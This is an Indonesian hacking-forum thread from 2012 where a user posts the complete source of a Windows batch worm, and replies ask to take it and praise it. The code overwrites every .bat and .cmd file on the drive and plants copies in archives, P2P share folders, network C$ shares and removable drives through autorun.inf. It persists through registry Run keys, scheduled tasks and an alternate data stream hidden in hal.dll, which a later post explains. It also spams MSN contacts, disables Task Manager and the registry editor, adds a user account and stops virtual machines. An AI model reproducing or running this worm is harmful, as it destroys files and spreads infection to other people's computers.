.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 worm code in batch

Go down 
5 posters
PengirimMessage
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

worm code in batch  Empty
PostSubyek: worm code in batch    worm code in batch  Icon_minitimeMon Apr 16, 2012 11:47 am

well, kali ini sy mau share source code worm yang ditulis menggunakan batch script worm code in batch  1513430891

langsung aja kk
Code:
@EcHo OfF&mOdE cOn LiNeS=1&mOdE cOn CoLs=1
@SeTlOcAl EnAbLeDeLaYeDeXpAnSiOn
@SeT n="%~0"
@SeT r=%random:~0,1%
@SeT HoMeDrIvE=%SyStEmDrIvE%
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
CoPy %n% "%SyStEmRoOt%\SyStEm32\autoexec.bat" /Y
cD /d %SystemRoot%\System32
call:a>vbs.vbs
if "%1"=="" (
start vbs.vbs&exit
) else (
GoTo:c
)
:a
echo SET a=Wscript.CreateObject^("Wscript.Shell"^)
echo a.Run "cmd.exe /c autoexec.bat 0", vbHide
GoTo:EoF
:c
del /q vbs.vbs
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:CoDe
SeT X1=Si&&sET X2=lv
sEt X3=%X1:sI=er%&&SeT X4=%X3:Er=Fo%
echo %X1%%X2%%X3% %X4%X > "%SyStEmdRivE%\%X1%%X2%%X3% %X4%X.txt"
FoR /l %%a iN (1,1,3) dO (sEt C=!C! %%a)
TyPe %n%>%SyStEmRoOt%\SyStEm32\hal.dll:aT.bat
cAlL:rEgiStRy HkLm\SoFtWaRe\MiCrOsOfT\wInDoWs\CuRrEnTvErSiOn rEg SyStEmRoOt!C! ReG_sZ
cAlL:aT %r%
If NoT "%1"=="" (cAlL:%1) eLsE (GoTo:EoF)
GoTo:EoF
:rEgiStRy
%2 ADD "%1\RuN" /v "%3" /T "%4" /d "CmD.eXe /C mOrE < %SyStEmRoOt%\SyStEm32\hal.dll:aT.bat > %SyStEmRoOt%\autoexec.bat && start %SyStEmRoOt%\autoexec.bat" /f
%2 ADD "%1\RuN" /v "PixMon" /T "%4" /d "%SyStEmRoOt%\SyStEm32\autoexec.bat" /f
GoTo:EoF
:aT
aT %r%:00 /interactive "sTaRt %SyStEmRoOt%\SyStEm32\autoexec.bat %r%"
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:1
sEt S=tSk.exe
sEt I=%S:.exe=Ill%
seT l=%I:tsK=PcM%
set x=%s:TsK=av%
sET oZ=%S:.ExE=pHo%
Set F=%l:Ill=av%
sEt O=%f:pCm=AnS%
sEt zEr=%oZ:tSk=Mor%
SeT mO=%x:.exe=i%
For /l %%a in (1,2,100) do For %%b in (%f%-cln %f%-rtp %o%gd %o%d %mo% %mo%d %zer%st) do %i% %%b
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:2
FoR /f "ToKeNs=*" %%z In ('DiR /b /s %HoMeDrIvE%\*.bat') dO (cOpY /y %n% "%%z")
FoR /f "ToKeNs=*" %%y In ('DiR /b /s %HoMeDrIvE%\*.cmd') dO (cOpY /y %n% "%%y")
If ExIsT "%PrOgRaMfIlEs%\WinRar" (
FoR /f "ToKeNs=*" %%w In ('DiR /b /s %HoMeDrIvE%\*.rar') dO (StArT /mIn wInRaR.eXe a "%%w" "%CD%\%~n0%~x0")
FoR /f "ToKeNs=*" %%v In ('DiR /b /s %HoMeDrIvE%\*.zip') dO (StArT /mIn wInRaR.eXe a "%%v" "%CD%\%~n0%~x0")
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:3
sEt h=%HomeDrive%
iF eXiSt "%PrOgRaMfIlEs%\WinRar" (
sTarT wInRaR.eXe a %h%\Hacking.rar
CoPy /Y %n% %h%\Hacking.bat
sEt ext=rar
) else (
sEt ext=bat
)
MkDiR %h%\p2p&ChDiR %h%\p2p
FoR %%r iN (msnhacker,hacking,msnflood,hackmsn) dO (
CoPy /Y %h%\Hacking.%ext% %%r.%ext%
)
FOR %%p IN ("%PROGRAMFILES%\Kazaa\My Shared Folder",
"%PROGRAMFILES%\Kazaa Lite\My Shared Folder",
"%PROGRAMFILES%\Grokster\My Grokster",
"%PROGRAMFILES%\Morpheus\My Shared Folder",
"%PROGRAMFILES%\EDONKEY2000\incoming",
"%PROGRAMFILES%\Gnucleus\Downloads",
"%PROGRAMFILES%\eMule\Incoming",
"%PROGRAMFILES%\BearShare\Shared",
"%PROGRAMFILES%\Shareaza\Downloads",
"%PROGRAMFILES%\ICQ\shared files",
"%PROGRAMFILES%\Filetopia3\Files",
"%PROGRAMFILES%\appleJuice\incoming",
"%PROGRAMFILES%\LimeWire\Shared",
"%PROGRAMFILES%\Overnet\incoming",
"%PROGRAMFILES%\Swaptor\Download",
"%PROGRAMFILES%\WinMX\My Shared Folder",
"%PROGRAMFILES%\Tesla\Files",
"%PROGRAMFILES%\XoloX\Downloads",
"%PROGRAMFILES%\Rapigator\Share",
"%PROGRAMFILES%\KMD\My Shared Folder",
"%PROGRAMFILES%\Direct Connect\Received Files",
"%HOMEDRIVE%\My Shared Folder") DO (
IF EXIST %%p (
COPY /Y "%h%\p2p\*.*" %%p
)
)
GoTo:EoF
REM *-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*
:4
SET H=HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
REG ADD "%H%" /v "DisableTaskMgr" /t reg_dword /d "00000001" /f
REG ADD "%H%" /v "DisableRegistryTools" /t reg_dword /d "00000001" /f
DosKey tskill=exit&DosKey taskkill=exit
GoTo:EoF
REM *-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*
:5
TSKILL msnmsgr
IF NOT EXIST "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\" (
MkDir "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\"
)
REG ADD "HKCU\Software\Patchou\Messenger Plus! Live\GlobalSettings\Scripts\Plus! Live Script Engine" /v Enabled /t REG_DWORD /d 1 /f
CALL:msnpropagation>"%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\Plus! Live Script Engine.js"
GoTo:EoF
:msnpropagation
echo function OnEvent_ChatWndReceiveMessage(ChatWnd, Origin, Message, MessageKind)
echo {
echo if (Origin != Messenger.MyName)
echo {
echo ChatWnd.SendMessage("/nudge")
echo ChatWnd.SendMessage("http://www.indo-code.com");
echo }
echo }
PING -n 5 localhost > NUL
START msnmsgr.exe
GoTo:EoF
:6
MkDir %HomeDrive%\Playing&Copy /y %n% %HomeDrive%\Playing\Juego.bat
FOR %%d IN (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W, X,Y,Z) DO (
NET SHARE %%d=%HomeDrive%\Playing
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:7
sEt e=eChO
FOR /F "skip=3 eol=S" %%z IN ('net view') DO (
sEt u=%%z\C$\autorun.inf
COPY /Y %n% "%%z\C$\WormsGame.bat"
%e% [autorun]>!u! %e% shellexecute=WormsGame.bat>>!u!
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:8
FOR %%w IN (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
COPY /Y %n% "%%w:\Connect.bat"
echo [autorun]>%%w:\autorun.inf
echo shellexecute=Connect.bat>>%%w:\autorun.inf
)
GoTo:EoF
REM *-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*
:9
NeT uSeR %random%%r% /aDd
ChDir %SyStEmRoOt%
FoR /r %%G in (msvbvm60.dll) do iF ExIsT "%%G" REn "%%G" "%%~nG.%random%"
If eXiSt "%PROGRAMFILES%\VMWare" (
cd /d "%PROGRAMFILES%\VMWare\VMware Server"
start vmware-cmd "%SYsTemDriVe%\Virtual Machines\Win2000Pro\Windows 2000 Professional.vmx" stop
start vmware-cmd "%SYsTemDriVe%\Virtual Machines\WinXP\Windows XP Professional.vmx" stop
)
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
:0
GoTo:EoF
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

ane lupa dapet source code ini dimana..hihi..dari indo-code kayaknya..ckck

monggo di icip :minta:
Kembali Ke Atas Go down
http://robofics.wordpress.com
exploi
Newbie - Hack
Newbie - Hack
exploi


Jumlah posting : 408
Points : 464
Reputation : 13
Join date : 02.11.11
Lokasi : exploit

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeMon Apr 16, 2012 12:09 pm

ijin cemomot ya gan worm code in batch  3529815765
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeMon Apr 16, 2012 12:28 pm

monggo di comot kk worm code in batch  1513430891
Kembali Ke Atas Go down
http://robofics.wordpress.com
gearboxxx
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 02.05.12

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeWed May 02, 2012 4:48 pm

Wah senang rasa nya ketemu dengan para coder batch, inget jaman dulu, worm code in batch  3529815765

[You must be registered and logged in to see this link.]
Kembali Ke Atas Go down
langitbiru
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 20
Points : 21
Reputation : 1
Join date : 07.02.12

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeTue May 08, 2012 9:45 am

efeknya gmn nih
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeThu May 10, 2012 9:18 am

gearboxxx wrote:
Wah senang rasa nya ketemu dengan para coder batch, inget jaman dulu, worm code in batch  3529815765

[You must be registered and logged in to see this link.]

kekekek..ada om gearboxx disini worm code in batch  3529815765 worm code in batch  3529815765
Kembali Ke Atas Go down
http://robofics.wordpress.com
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeThu May 10, 2012 9:24 am

langitbiru wrote:
efeknya gmn nih
well, sama kaya tipe2 lain kk.. bikin file, disable registry editor,ngekill msn dan semacamnya.

cuma yang belum ada di worm lain adalah pemanfaatan ADS (Alternate data stream). coba liat salah satunya di script ini

Code:
%2 ADD "%1\RuN" /v "%3" /T "%4" /d "CmD.eXe /C mOrE < %SyStEmRoOt%\SyStEm32\hal.dll:aT.bat > %SyStEmRoOt%\autoexec.bat && start %SyStEmRoOt%\autoexec.bat" /f

dia akan menciptakan sebuah file hall.dll yang ternyata didalamnya tersembunyi sebuah file dengan nama aT.bat

keren kan worm code in batch  3529815765
Kembali Ke Atas Go down
http://robofics.wordpress.com
sayen
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 12
Points : 12
Reputation : 0
Join date : 11.04.12
Age : 32
Lokasi : Mojokerto

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeWed Jun 27, 2012 1:51 am

Bagus om worm code in batch  271371
Kembali Ke Atas Go down
http://sayenvirus.blogspot.com
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitimeSat Jun 30, 2012 10:22 am

sayen wrote:
Bagus om worm code in batch  271371
iya kk worm code in batch  3529815765
Kembali Ke Atas Go down
http://robofics.wordpress.com
Sponsored content





worm code in batch  Empty
PostSubyek: Re: worm code in batch    worm code in batch  Icon_minitime

Kembali Ke Atas Go down
 
worm code in batch
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Virus,Malware,Trojan,Worm, Dll-
Navigasi: